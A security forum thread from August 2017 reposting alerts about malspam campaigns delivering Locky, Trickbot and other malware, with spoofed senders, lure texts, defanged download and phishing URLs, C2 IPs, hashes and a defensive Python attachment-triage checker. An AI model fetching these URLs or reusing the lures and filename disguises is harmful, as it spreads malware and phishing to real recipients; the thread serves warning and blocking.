SPAM frauds, fakes, and other MALWARE deliveries...

AplusWebMaster
2017-08-23, 11:54
FYI...

Fake 'purchase order' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-purchase-order-delivering-malware/
23 Aug 2017 - "... an email with the subject of 'RFQ072017' coming from Stafford Shawn <staffordshawn1@ yahoo .com> (possibly random senders) but definitely coming via Yahoo email network with a zip attachment containing a file that pretends to be a pdf file but is an .exe file... All detections on VirusTotal are heuristic or generic detections but it is quite well detected.
Update: I am reliably informed it is nanocore RAT 1.2.2.0...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/RFQ072017.png

SCAN_PO#20170823.PDF.z: Extracts to: SCAN_PO#20170823.PDF.z.exe - Current Virus total detections 23/64*
Payload Security**... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/cd1127ef01e114ab7a88d64d13b0af0a8722ff3f8fc6f9acc043aa60c73567c5/analysis/1503458477/

** https://www.hybrid-analysis.com/sample/cd1127ef01e114ab7a88d64d13b0af0a8722ff3f8fc6f9acc043aa60c73567c5?environmentId=100
Contacted Hosts
185.12.45.79
___

Fake 'Ref' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-barclays-bank-ref-72381821-delivers-trickbot-banking-trojan/
23 Aug 2017 - "An email with the subject of 'Ref: 72381821' pretending to come from Barclays Bank but actually coming from a look-a-like domain Barclays <message@ barclaysmail .co.uk> -or- Barclays <message@ barclays-mail .co.uk> with a malicious word doc attachment is today’s latest spoof of a well known company, bank or public authority delivering Trickbot banking Trojan... spoofed domains are barclaysmail .co.uk 46.21.147.128 AS35017 Swiftway Sp. z o.o. and barclays-mail .co.uk 85.93.88.35 malta2333.startdedicated .net AS8972 Host Europe GmbH...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Ref-72381821-fake-Barclays-email.png

Ref72381821.doc - Current Virus total detections 4/58*. Payload Security**... This malware file downloads from
http ://eva-wagner .net/picture_library/logo.png which of course is -not- an image file but a renamed .exe file that gets renamed to hgfudf.exe and autorun (VirusTotal 18/63***). An alternative download location is
http ://eva-poldi .at/logo.png
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/557f761f59fb14c02d53c0336906eab0b2f5d1fed50178b169971e7302d847d7/analysis/1503484026/
attachment20170823-17020-5y3sht.doc

** https://www.hybrid-analysis.com/sample/557f761f59fb14c02d53c0336906eab0b2f5d1fed50178b169971e7302d847d7?environmentId=100
Contacted Hosts
62.138.14.149
37.120.182.208
51.254.164.249
188.165.62.11

*** https://www.virustotal.com/en/file/688768dd8c7043e4d357490cf83d7597e33a1e8485ee1f0ed478cba45a21e212/analysis/
hgfudf.exe

eva-wagner .net: 148.251.26.133: https://www.virustotal.com/en/ip-address/148.251.26.133/information/
> https://www.virustotal.com/en/url/0285ff07a83ba1cb3492be118ee707240e8cf03d2318e9a0cd50b7316672b542/analysis/

eva-poldi .at: 62.138.14.149: https://www.virustotal.com/en/ip-address/62.138.14.149/information/
> https://www.virustotal.com/en/url/0832ae41560d47c66e568ce306f91b939c56b33ddc28f367f0fec73bfc36d639/analysis/
___

Fake 'Fax' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/locky-delivered-via-fake-free-fax-to-email-malspam/
22 Aug 2017 - "... series of Locky downloaders... an email with the subject of 'Fax from: (01242) 856225' [random numbers] pretending to come from Free Fax to Email <freefaxtoemail@ random email domain>...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Fax-from-01242-856225.png

Fax278044344f0dd0b.rar: Extracts to: Fax1423519vc18e7c3.js - Current Virus total detections 16/55*
Payload Security** - delivers /REjhb54 (VirusTotal ***)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/794dcfdcc1362140eee6fcda11ddf239ab048a965bba634bb787321db9672cfa/analysis/1480616575/
-6dt874p53077.js

** https://www.hybrid-analysis.com/sample/372a3bede528be194ad35721b4ac25e71f687bdb0d1efe3ad428a23654014a0c?environmentId=100
Contacted Hosts
192.169.226.106
82.118.17.218
5.196.99.239

*** https://www.virustotal.com/#/file/61ab284b33d34fedb4725c0c3e5e1a2a4a3cc3767f29b10b87dd8598bfda2471/detection
??

:fear::fear: :mad:

AplusWebMaster
2017-08-24, 13:53
FYI...

Fake 'Invoice' SPAM - leads to Locky
- http://blog.dynamoo.com/2017/08/malware-spam-customer-service-copy-of.html
23 Aug 2017 - "This fairly generic spam leads to Locky ransomware:
Subject: Copy of Invoice 3206
From: "Customer Service"
Date: Wed, August 23, 2017 9:12 pm
Please download file containing your order information.
If you have any further questions regarding your invoice, please call Customer Service.
Please do not reply directly to this automatically generated e-mail message.
Thank you.
Customer Service Department

A -link-in-the-email- downloads a malicious VBS script, and because it's quite late I'll just say that Hybrid Analysis* has seen it all before. The download EXE (VT 21/64**) script POSTS to 5.196.99.239 /imageload.cgi (Just Hosting, Russia) which is in a network block that also had a fair bit of Angler*** last year, so I would recommend blocking all traffic to 5.196.99.0/24."
* https://www.hybrid-analysis.com/sample/edfc3cdcac9f81b412f3379c779e3c33d0745cc64e45e503d5ee98ec8d1067f6?environmentId=100
Contacted Hosts

** https://www.virustotal.com/en/file/09f1d49065108a595578ff86ff63a514d47d5496ab5c23f38cda1f0d57dd6cd1/analysis/

*** https://pastebin.com/D5pXvR1W

:fear::fear: :mad:

AplusWebMaster
2017-08-24, 20:21
FYI...

Fake 'Secure Message' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-bank-of-america-secure-message-delivers-trickbot-banking-trojan/
24 Aug 2017 - "An email with the subject of 'Secure email message' pretending to come from Bank of America but actually coming from a look-a-like domain Bank of America <message@ bofamsg .com> or Bank of America <message@ bofa-msg .com> with a malicious word doc attachment is today’s latest spoof of a well known company, bank or public authority delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/bofa_securemessage_email.png

SecureMessage.doc - Current Virus total detections 7/58*. Payload Security**. This malware file downloads from
http ://esp .jp/serca.png which of course is -not- an image file but a renamed .exe file that gets renamed to Aoitas.exe (VirusTotal ***). An alternative download location is
http ://enyahoikuen .com/serca.png ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/38091a37753ed505bca29da77efaaf6d811b219ff1c4758cbf9f3ee9f2941ffa/analysis/
SecureMessage.doc

** https://www.hybrid-analysis.com/sample/38091a37753ed505bca29da77efaaf6d811b219ff1c4758cbf9f3ee9f2941ffa?environmentId=100
Contacted Hosts
121.50.42.51
78.47.139.102
195.133.197.70
79.124.78.81

*** https://www.virustotal.com/en/file/01c71fda419afbeafa854a3576ac0aa75b600f4e671373e678b6bd10f9b74c77/analysis/
serca.png

esp .jp: 121.50.42.51: https://www.virustotal.com/en/ip-address/121.50.42.51/information/
> https://www.virustotal.com/en/url/8d8dc8d48d7f78c251abbf6ae882f91f2bc03823d5ced01f2a79778a0a973f3a/analysis/

enyahoikuen .com: 202.231.207.151: https://www.virustotal.com/en/ip-address/202.231.207.151/information/
> https://www.virustotal.com/en/url/e67ae37ab7fcdfba65d26b6d675558233704a1cbe1d2c39294860a2f35fe4cd1/analysis/
___

Fake 'BT bill' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/locky-delivered-by-fake-bt-bill/
24 Aug 2017 - "... Locky downloader... an email with the subject of 'New BT Bill' pretending to come from BT Business <btbusiness@ bttconnect .com> with a-link-in-the-body- of the email to download a zip file...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Locky_BT-bill.png

bill-201708.zip: Extracts to: bill-201708.exe - Current Virus total detections 19/65*. Payload Security**.
Currently all the copies I am seeing (hundreds of them) have -2- download links in the email body:
http ://kabbionionsesions .net/af/bill-201708.rar -and- http ://metoristrontgui .info/af/bill-201708.zip
-both- domains have been spreading Locky all day. The downloads are extremely slow but I eventually got the zip version. Also several emails with
http ://kabbionionsesions .net/af/download.php (currently 404) and
http ://kabbionionsesions .net/af/bill-201708.7z (also 404)...
The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/abacabfc7c6550bd8594fd0b758c3f890a01212fcc23d3a04b04f761684cc86e/analysis/1503597867/
bill-201708.exe

** https://www.hybrid-analysis.com/sample/abacabfc7c6550bd8594fd0b758c3f890a01212fcc23d3a04b04f761684cc86e?environmentId=100
Contacted Hosts
185.179.190.31
216.58.206.228
216.58.206.238

kabbionionsesions .net: 47.89.246.2: https://www.virustotal.com/en/ip-address/47.89.246.2/information/
> https://www.virustotal.com/en/url/26ef369848e40dbef13d71d98345686a99478da0f5c30e489274a5675a1c68bd/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-08-25, 13:41
FYI...

Fake 'Secure Message' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-lloyds-bank-you-have-a-new-secure-message-malspam-delivers-trickbot-banking-trojan/
25 Aug 2017 - "An email with the subject of 'You have a new secure Message' pretending to come from Lloyds Bank but actually coming from a look-a-like domain Lloyds Bank <message@ lloydsbankmsg .com> or Lloyds Bank <message@ lloydsbank-msg .com> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan... spoofed domains are lloydsbankmsg .com 46.21.147.242 and lloydsbank-msg .com 109.235.52.44 ...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/fake-lloyds-bank-secure-message-email.png

The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/lloyds-bank-EncryptedMessage_doc.png

EncryptedMessage.doc - Current Virus total detections 6/58*. Payload Security**. This malware file downloads from
http ://fabianpfau .de/logo.png which of course is -not- an image file but a renamed .exe file that gets renamed to lnmflgf.exe (VirusTotal 13/65***). An alternative download location is
http ://evakrause .nl/logo.png
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f80b44c328c591b02b6f973765a8ca3faae11f1806f24f91e0f56348c092c502/analysis/1503657342/
EncryptedMessage.doc

** https://www.hybrid-analysis.com/sample/f80b44c328c591b02b6f973765a8ca3faae11f1806f24f91e0f56348c092c502?environmentId=100
Contacted Hosts
176.28.13.220
216.239.32.21
131.153.40.196

*** https://www.virustotal.com/en/file/6efcb43053ba277c989992f9ddee98cf6be65ca6e740f6434d94f9c900f15094/analysis/1503658322/
lnmflgf.exe

fabianpfau .de: 176.28.13.220: https://www.virustotal.com/en/ip-address/176.28.13.220/information/
> https://www.virustotal.com/en/url/ff48716e2d27b89b45c87bfe5985d48f8e21838e5308b542d6d02fa0f60694d1/analysis/

evakrause .nl: 94.126.70.16: https://www.virustotal.com/en/ip-address/94.126.70.16/information/
> https://www.virustotal.com/en/url/3ff9af82ba6eda5b7324eafd1100251c8210e1a7b12e4b3d82eeb6a392534f8c/analysis/
___

Fake 'Sage invoice' SPAM - leads to Locky
- http://blog.dynamoo.com/2017/08/malware-spam-your-sage-subscription.html
25 Aug 2017 - "This -fake- Sage invoice leads to Locky ransomware. Quite why Sage are picked on so much[1] by the bad guys is a bit of a mystery.
[1] http://blog.dynamoo.com/search?q=sage

Screenshot: https://1.bp.blogspot.com/-d685K3apnF8/WZ_feKBwrMI/AAAAAAAAMOg/IX2uHRL2T18gOmwmE1PE_LHpJgUFUaIkQCLcBGAs/s1600/sage.png

The link-in-the-email downloads a malicious RAR file. The samples I saw were closely clustered alphabetically.
helpmatheogrow .com/SINV0709.rar
hendrikvankerkhove .be/SINV0709.rar
heinverwer .nl/SINV0709.rar
help .ads .gov.ba/SINV0709.rar
harvia .uz/SINV0709.rar
The RAR file itself contains a malicious VBS script... with a detection rate of 19/56*, which attempts to download another component from:
go-coo .jp/HygHGF
hausgerhard .com/HygHGF
hausgadum .de/HygHGF
bromesterionod .net/af/HygHGF
hartwig-mau .de/HygHGF
hecam .de/HygHGF
haboosh-law .com/HygHGF
hbwconsultants .nl/HygHGF
hansstock .de/HygHGF
heimatverein-menne .de/HygHGF
Automated analysis of the file [1] [2] shows a dropped binary with a 39/64** detection rate, POSTing to 46.183.165.45 /imageload.cgi (Reg.Ru, Russia)
Recommended blocklist:
46.183.165.45 "
* https://virustotal.com/en/file/aa75f8ecb2a990615dc534155a15fd9d8ea99ca2db718e8bc6092dc07fda9b2c/analysis/
bill-201708.exe

1] https://malwr.com/analysis/ODY3NjZjZmYxNDk0NGU2ZTk4ZGM4MTQyMTEzNDU0MWY/
SINV0709.vbs
Hosts
203.183.65.225
46.183.165.45

2] https://www.hybrid-analysis.com/sample/aa75f8ecb2a990615dc534155a15fd9d8ea99ca2db718e8bc6092dc07fda9b2c?environmentId=100
Contacted Hosts
203.183.65.225
46.183.165.45

** https://www.virustotal.com/en/file/abacabfc7c6550bd8594fd0b758c3f890a01212fcc23d3a04b04f761684cc86e/analysis/
bill-201708.exe

... Fake 'Sage invoice' variant - delivers Locky
> https://myonlinesecurity.co.uk/your-sage-subscription-invoice-is-ready-deliver-locky-ransomware/
24 Aug 2017

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/sagetop_Your-Sage-subscription-invoice-is-ready.png

> https://www.virustotal.com/en/file/aa75f8ecb2a990615dc534155a15fd9d8ea99ca2db718e8bc6092dc07fda9b2c/analysis/1503606828/
SINV0709.vbs
15/57

SINV0711.docm - Current Virus total detections *. Payload Security**...

* https://www.virustotal.com/en/file/027d37e56f9878cb334d35ebe49080061f9c5436e6d7c8f67fd732fe3ff85001/analysis/1503602547/
SINV0711.docm
9/59

** https://www.hybrid-analysis.com/sample/027d37e56f9878cb334d35ebe49080061f9c5436e6d7c8f67fd732fe3ff85001?environmentId=100
Contacted Hosts
83.169.35.187
185.179.190.31

help.ads .gov.ba: 80.65.162.70: https://www.virustotal.com/en/ip-address/80.65.162.70/information/
> https://www.virustotal.com/en/url/c65403b44ae916a106beaaa56b292ef56587be3bbbcd1d4e0f68d9b6e2348ebb/analysis/

hausverwaltungfrankfurt .de: 83.169.35.187: https://www.virustotal.com/en/ip-address/83.169.35.187/information/
> https://www.virustotal.com/en/url/90001706c9220405b448c34fc994b51044b04ed0b0cce32cc6217d776d04699b/analysis/
___

Fake 'Voicemail' SPAM - leads to Locky
- http://blog.dynamoo.com/2017/08/malware-spam-voicemail-service-new.html
25 Aug 2017 - "The jumble of numbers in this spam is a bit confusing. Attached is a malicious RAR file that leads to Locky ransomware.
Subject: New voice message 18538124076 in mailbox 185381240761 from "18538124076" <6641063681>
From: "Voicemail Service" [vmservice@ victimdomain .tdl]
Date: Fri, August 25, 2017 12:36 pm
Dear user:
just wanted to let you know you were just left a 0:13 long message (number 18538124076)
in mailbox 185381240761 from "18538124076" <6641063681>, on Fri, 25 Aug 2017
14:36:41 +0300
so you might want to check it when you get a chance. Thanks!
--Voicemail Service

Attached is a RAR file containing a malicious VBS script. The scripts are all slightly different, meaning that the RARs are too... The VBS script is similar to this* (variable names seem to change mostly) with a detection rate of about 15/59**. Hybrid Analysis*** shows it dropping a Locky executable with a 18/65[4] detection rate which phones home to 46.17.44.153 /imageload.cgi (Baxnet, Russia) which I recommend that you block."
* https://pastebin.com/UK2MYHct

** https://virustotal.com/en/file/21207599eedb3ad315571fadcd3d843fbe2e213f1c9970208612a7834b170b55/analysis/
20170825_ID904754594.vbs

*** https://www.hybrid-analysis.com/sample/21207599eedb3ad315571fadcd3d843fbe2e213f1c9970208612a7834b170b55?environmentId=100
Contacted Hosts

4] https://www.virustotal.com/en/file/0f75c08edc81483acae170972d3f24dea05149295773badc126a61961525c251/analysis/
UYGgfhRDSaa

:fear::fear: :mad:
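Added example, not code from the forum or from the blogs it quotes: a defender-side triage check for the disguises that recur in the posts above (the double extension in SCAN_PO#20170823.PDF.z.exe, the logo.png / serca.png downloads that are really PE files, the dot-padded DHL filename, and bare .js/.vbs droppers). Filenames are taken from the posts; the sample bytes are constructed placeholders, and the finding labels are my own naming.

```python
"""Triage e-mail attachments / second-stage downloads by comparing the
claimed extension with the leading bytes. Sample bytes are constructed."""
import os
import re

# Magic-byte prefixes for the container types seen in these malspam runs.
SIGNATURES = [
    ("pe",  b"MZ"),                                # Windows executable
    ("pdf", b"%PDF-"),
    ("png", b"\x89PNG\r\n\x1a\n"),
    ("zip", b"PK\x03\x04"),                        # also .docx/.docm/.jar
    ("rar", b"Rar!\x1a\x07"),
    ("7z",  b"7z\xbc\xaf\x27\x1c"),
    ("ole", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"),  # legacy .doc/.xls
]

# Container type an extension is expected to carry.
EXPECTED = {
    ".exe": "pe", ".dll": "pe", ".scr": "pe",
    ".pdf": "pdf", ".png": "png",
    ".zip": "zip", ".docx": "zip", ".docm": "zip", ".jar": "zip",
    ".rar": "rar", ".7z": "7z", ".doc": "ole",
}
PE_EXTS = {".exe", ".dll", ".scr"}
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf"}


def sniff(data: bytes) -> str:
    """Container type implied by the leading bytes, or 'unknown'."""
    for label, magic in SIGNATURES:
        if data.startswith(magic):
            return label
    return "unknown"


def extensions(name: str) -> list:
    """All dotted suffixes, lowercased: 'a.PDF.z.exe' -> ['.pdf', '.z', '.exe']."""
    parts = os.path.basename(name).split(".")
    return ["." + p.lower() for p in parts[1:]]


def analyse_attachment(name: str, data: bytes) -> dict:
    """Return claimed type, sniffed type and a list of static findings."""
    exts = extensions(name)
    last = exts[-1] if exts else ""
    actual = sniff(data)
    findings = []

    # Double extension: a document-looking suffix before a final executable one.
    if last in PE_EXTS | SCRIPT_EXTS and any(
        EXPECTED.get(e) not in (None, "pe") for e in exts[:-1]
    ):
        findings.append("double-extension")

    # Runs of dots / ellipsis characters that push the real extension out of
    # view in the mail client ('Consignment form……………..ace').
    if re.search(r"[.\u2026]{3,}", os.path.basename(name)):
        findings.append("padded-name")

    # Bytes contradict the extension, e.g. logo.png that starts with MZ.
    expected = EXPECTED.get(last)
    if expected and actual != "unknown" and actual != expected:
        findings.append(f"content-mismatch:{last}->{actual}")

    # A PE under any name that is not an executable extension.
    if actual == "pe" and last not in PE_EXTS:
        findings.append("disguised-executable")

    # Bare script files are the Locky downloaders in these runs.
    if last in SCRIPT_EXTS:
        findings.append("script-attachment")

    # Caveat: a genuine .doc/.docm carrying a macro passes every check above;
    # that case needs macro inspection (e.g. olevba), not type sniffing.
    return {"name": name, "claimed": last, "actual": actual,
            "findings": findings, "suspicious": bool(findings)}


# Constructed samples: filenames from the posts, bytes are placeholders.
SAMPLES = [
    ("SCAN_PO#20170823.PDF.z.exe", b"MZ\x90\x00" + b"\x00" * 60),
    ("logo.png", b"MZ\x90\x00" + b"\x00" * 60),
    ("Ref72381821.doc", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8),
    ("DHL GLOBAL Consignment form……………………………..ace", b"\x00" * 16),
    ("Fax1423519vc18e7c3.js", b"var a = 1;"),
]


def triage(samples=SAMPLES) -> dict:
    """Map each filename to its findings (empty list = no static finding)."""
    return {n: analyse_attachment(n, d)["findings"] for n, d in samples}
```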

AplusWebMaster
2017-08-26, 13:22
FYI...

Fake 'DHL' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-dhl-global-freight-consignment-form-malspam-delivers-malware/
26 Aug 2017 - "... an email with the subject of 'DHL GLOBAL FREIGHT CONSIGNMENT FORM' coming from DHL GLOBAL WORLD WIDE AGENT <deddi@ karebet-group .com> with an .ace attachment delivers malware... returns are coming back from several antivirus companies describing this as .Win32.SpyEyes[1]...
1] https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Spyeye

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/DHL-GLOBAL-FREIGHT-CONSIGNMENT-FORM.png

DHL GLOBAL Consignment form……………………………..ace: Extracts to: Purchase order.exe
Current Virus total detections 17/65*. Payload Security**. This drops a modified version of itself as win32.exe (VirusTotal 17/64***) it also contacts
http :// 98.142.221.58/~comsgautopart/.regedit/mail/home/gate.php ...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/9de4b1aef8adaf1eef2a22d5007a03509cf8496bddf94e8494ece49b03cfc47d/analysis/1503723385/
Purchase order.exe

** https://www.hybrid-analysis.com/sample/9de4b1aef8adaf1eef2a22d5007a03509cf8496bddf94e8494ece49b03cfc47d?environmentId=100

*** https://www.virustotal.com/en/file/ebc2d9c654484ae422723adeeee984475925da8d1e4818964358dc35abcb8dc1/analysis/1503723627/
win32.exe

98.142.221.58: https://www.virustotal.com/en/ip-address/98.142.221.58/information/
___

Fake 'Purchase Contract' SPAM - delivers java adwind
- https://myonlinesecurity.co.uk/purchase-contract-of-po30po31-delivers-java-adwind/
26 Aug 2017

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Purchase-Contract-of-PO30-PO31.png

Doc Purchase Contract of PO30PO31.jar (547kb) - Current Virus total detections *. Payload Security**...

The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ab5e1ec1d34db49ec6ecbdf92c8025397f1a4953e6d7a0277a1bfbeecc2233cf/analysis/1503773842/
Doc Purchase Contract of PO30PO31.jar

** https://www.hybrid-analysis.com/sample/ab5e1ec1d34db49ec6ecbdf92c8025397f1a4953e6d7a0277a1bfbeecc2233cf?environmentId=100
Contacted Hosts
5.178.43.16

:fear::fear: :mad:

AplusWebMaster
2017-08-28, 20:58
FYI...

Defray - New Ransomware targets Education and Healthcare
> https://www.helpnetsecurity.com/2017/08/28/custom-ransomware-delivered/
Aug 28, 2017

>> https://www.darkreading.com/application-security/new-targeted-ransomware-hits-healthcare-manufacturing-/d/d-id/1329725
8/25/2017

> https://www.proofpoint.com/us/threat-insight/post/defray-new-ransomware-targeting-education-and-healthcare-verticals
Aug 24, 2017 - "... distribution of Defray has several notable characteristics:
Defray is currently being spread via Microsoft Word document attachments in email
The campaigns are as small as several messages each
The lures are custom crafted to appeal to the intended set of potential victims
The recipients are individuals or distribution lists, e.g., group@ and websupport@
Geographic targeting is in the UK and US
Vertical targeting varies by campaign and is narrow and selective
On August 22, Proofpoint researchers detected an email campaign targeted primarily at Healthcare and Education involving messages with a Microsoft Word document containing an embedded executable... Defray may cause other general havoc on the system by -disabling- startup recovery and -deleting- volume shadow copies. On Windows 7 the ransomware monitors and kills running programs with a GUI, such as the task manager and browsers. We have not observed the same behavior on Windows XP..."
Indicators of Compromise (IOCs) [ ... more listed at the proofpoint URL above. ]
C&C IP
145.14.145.115: https://www.virustotal.com/en/ip-address/145.14.145.115/information/

:fear::fear: :mad:

AplusWebMaster
2017-08-29, 12:32
FYI...

Fake 'BT bill' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-bt-bill-pretending-to-come-from-your-own-email-address-or-company-delivers-locky-ransomware/
29 Aug 2017 - "... Locky downloader... email has the subject of 'Overdue BT bill' pretending to come from random names at your-own-email-address...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/overdue-BT-bill.png

Scan_201708293861.zip: Extracts to: scan_201708292366.zip which eventually extracts to scan_201708292366.vbs - Current Virus total detections 11/59*. Payload Security**... first attachment I chose leads to a site giving a 404 so the results are very good. Another attachment gives better results
(VirusTotal 0/58***) where another researcher has filled in all the blanks in the comments[4]...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/df2a29cac64eb1e1a266622a208cb813178cb91b043e1a40a92abd3c73d85f46/analysis/1503998928/
scan_201708292366.vbs

** https://www.hybrid-analysis.com/sample/df2a29cac64eb1e1a266622a208cb813178cb91b043e1a40a92abd3c73d85f46?environmentId=100
Contacted Hosts
81.2.195.144

*** https://www.virustotal.com/en/file/6f004bb661bc9861e3730ebfdc8c50f356c8309a1dece632daa0466e3eae807a/analysis/1503999225/

4] https://twitter.com/Racco42/status/902465569965973504

> https://www.virustotal.com/en/file/a116850c789d42bcc00f3338ca155690faed30a377bb06ca1919ab9bda1585a7/analysis/1503999480/
9/65
___

Fake 'scan' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/you-have-received-a-scan-from-at-management-malspam-delivering-locky-ransomware/
29 Aug 2017 - "... Locky downloader... an email with the subject of 'You have received a scan from AT Management' pretending to come from Scan @ AT Management <scan_754@ atmanagement .co.uk> [random numbers after the scan_]. All these are being addressed to Accounts: <name@ victimdomain .tld>...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/You-have-received-a-scan-from-AT-Management.png

... same sites, file names and payload as today’s earlier ^malspam run^ delivering Locky ransomware:
> https://myonlinesecurity.co.uk/fake-bt-bill-pretending-to-come-from-your-own-email-address-or-company-delivers-locky-ransomware/

... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
___

Amazon phish...
- https://myonlinesecurity.co.uk/you-sold-an-item-spam-is-an-amazon-phishing-attempt/
29 Aug 2017 - "We see a lot of Amazon phishing attempts. This one is quite different to the usual ones we see. Although there are a lot of Amazon sellers, the chances of a mass malspam like this one actually being received by a seller is quite small compared with the more usual 'payment review' or 'your account was signed into from an unknown computer' or similar scams.
'You sold an item' pretending to come from Amazon <selleramazon@ reply.amazon .com> is one of the latest phish attempts to steal your Amazon Account and your Bank details. This one only wants your Amazon log in details and bank details. Many of them are also designed to specifically steal your email and other log in details as well...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Amazon_phishing_You_sold_an_item.png

The link-in-the-email goes to:
https ://www.google .co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&cad=rja&uact=8&ved=0ahUKEwiO9aOs-vvVAhXBZFAKHY3XCYgQFghJMAc&url=http%3A%2F%2Fwww.almatulum.com%2Fcontact-2%2F&usg=AFQjCNFdrv7025EsAfzW8QKj40lSrovIbA
which redirects to:
https ://directele .net/user_guide/documentation/amazon.co.uk/Amazon-Sign-In.htm?adenlankenadransakbnizwetmilrtuniietnnudbenwdiaateaaleeaallilaadmusmdzmnlelubbaalamzsnaittsndakaweiuidaawnamdlerendeuedimnailtrdtaknzeaanmleni4493782410

If you follow the link you see a webpage looking like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/amazon_phish_directele_net.png

When you fill in your user name and password you get a page looking like this, asking for your bank sort code and bank-account-number. I am not quite sure what they can do with this on its own without passwords or bank login details. However knowing that quite a high proportion of users do re-use login details and passwords on multiple sites, it is not beyond the realms of possibility that your Amazon account, email log in and bank log in all -share- a password:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/amazon_phish_directele_net_1.png

You then get -redirected- to the genuine Amazon suite for your country..."

directele .net: 166.62.73.164: https://www.virustotal.com/en/ip-address/166.62.73.164/information/
> https://www.virustotal.com/en/url/78c29502f16cead658556df495aa247343722f6de5b877c455612997d6db1909/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-08-30, 12:54
FYI...

Fake 'Emailing Payment' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/more-locky-ransomware-delivered-by-emailing-payment_201708-malspam/
30 Aug 2017 - "... Locky downloader... an email with the subject of 'Emailing: Payment_201708-838 [the “Emailing: Payment_201708-” stays consistent but the final 3 to 5 digits are random] pretending to come from random names at your-own-email-address or company-domain-addresses to another random name at your-own-domain...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Emailing-Payment_201708-838.png

Payment_201708-838.7z: Extracts to: Payment_201708-2866.jse - Current Virus total detections 14/59*.
Payload Security**. Locky payload: (VirusTotal 31/65***).
Another researcher has posted already about this one with several links to download sites and C2 IP numbers:
> https://hazmalware.wordpress.com/2017/08/29/2017-08-29-emailing-payment_201708-1234-leads-to-locky-ransomware/
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ff7b03ca1e1c00076c782d2fcdb2273fe7329f07d5618f63eaefeff2d75ba87c/analysis/1504067419/

** https://www.hybrid-analysis.com/sample/ff7b03ca1e1c00076c782d2fcdb2273fe7329f07d5618f63eaefeff2d75ba87c?environmentId=100
Contacted Hosts

*** https://www.virustotal.com/en/file/ce9469a6e37a26a7f6673ef1e63ba6b66162cfe8aaf68c2a6df075ebe0fe7886/analysis/
CuuDxa1.exe

146.120.110.46: https://www.virustotal.com/en/ip-address/146.120.110.46/information/
> https://www.virustotal.com/en/url/5a4464b5daf815639e2336e6e4d3ab0af14ea984815ffaa376402781044d3b58/analysis/

46.183.165.45: https://www.virustotal.com/en/ip-address/46.183.165.45/information/
> https://www.virustotal.com/en/url/7c70d748aecb36544a5fc1f3b478e96ae67332c3bb3c3c7cc74aa8403aa05f58/analysis/
___

Fake 'E-invoice' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-apple-e-invoice-malspam-delivers-locky-ransomware/
30 Aug 2017 - "... Locky downloader... an email with the subject of 'E-invoice for your order #6377810026' [random numbers] pretending to come from do_not_reply@ random Apple email addresses.... the addresses I have seen include:
do_not_reply@ eu.apple .com
do_not_reply@ asia .apple.com
do_not_reply@us .apple .com ...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/E-invoice-for-your-order-6377810026.png

9891613510.7z: Extracts to: 9891611187.vbs - Current Virus total detections 10/59*. Payload Security**.
Locky Binary (VirusTotal 17/65***). These droppers have gone back to the old way of downloading Locky from the remote server, by downloading an encrypted text file that needs to be decoded by the script... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ccb37237584d7b3101a48e38f47a6a5e8c063fa714e27a8da2641e53d943629c/analysis/1504086697/
9891611187.vbs

